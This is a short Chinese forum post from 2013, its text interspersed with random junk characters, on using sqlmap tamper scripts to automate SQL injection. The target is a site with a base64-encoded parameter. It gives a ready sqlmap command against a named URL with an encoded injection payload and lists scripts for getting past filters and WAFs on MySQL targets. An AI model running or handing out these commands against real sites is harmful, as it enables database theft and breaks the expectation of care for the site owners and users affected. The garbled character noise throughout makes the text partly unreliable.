WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
! h6 O0 a4 \# w$ N8 S4 }; U g* Y- z# d: D7 L% Z& F
sqlmap的tamper里有个base64encode.py9 Z8 N# G2 V- ^' v ]0 m; m
9 {9 Y* }" r4 q2 q+ a5 X; V
使用如下" U% E: L5 a: O$ Q
5 b$ F4 s' E& O1 v3 Osqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs9 d' n3 U# k* r* J: l, d' w8 ^" H
" F7 B+ o, t3 a) z
2 ^7 E$ S8 X& g0 |
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”7 i8 F$ F5 u2 d) l, U: N/ M7 q
- v0 k6 o2 `# X: |2 v
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:% t- u1 P% p- A7 q+ s
5 A {1 m8 b9 R( ~. }( F
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入" ]8 @0 H9 \( i6 f
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入% K( A7 _8 {% T0 T) H
首先确定目标数据库版本,然后选择相应的脚本。6 R1 h. B9 h8 a% {
-v 3 --batch --tamper "space2hash.py"
+ s7 Z2 b: |6 D/ N- M' Z0 H- K) [2 d' M; N
还有其他一些插件:
% l- I8 Z& u& G! }& T! V6 j: nencodes编码 ——charencode.py; J& \' p- j' s% n
base64编码 —— base64encode.py8 g9 I- q8 @3 ^' a
替换空格和关键字 —— halfversionedmorekeywords.py7 x2 x- b0 u' q
|
1 I7 v# ~- H1 }( x/ t
+ Z8 H) S% [& z/ G% m W* {1 F$ T
8 I. @$ R% e1 C s! g, f2 S |
发表于 2013-11-23 15:50:45
收藏
支持
反对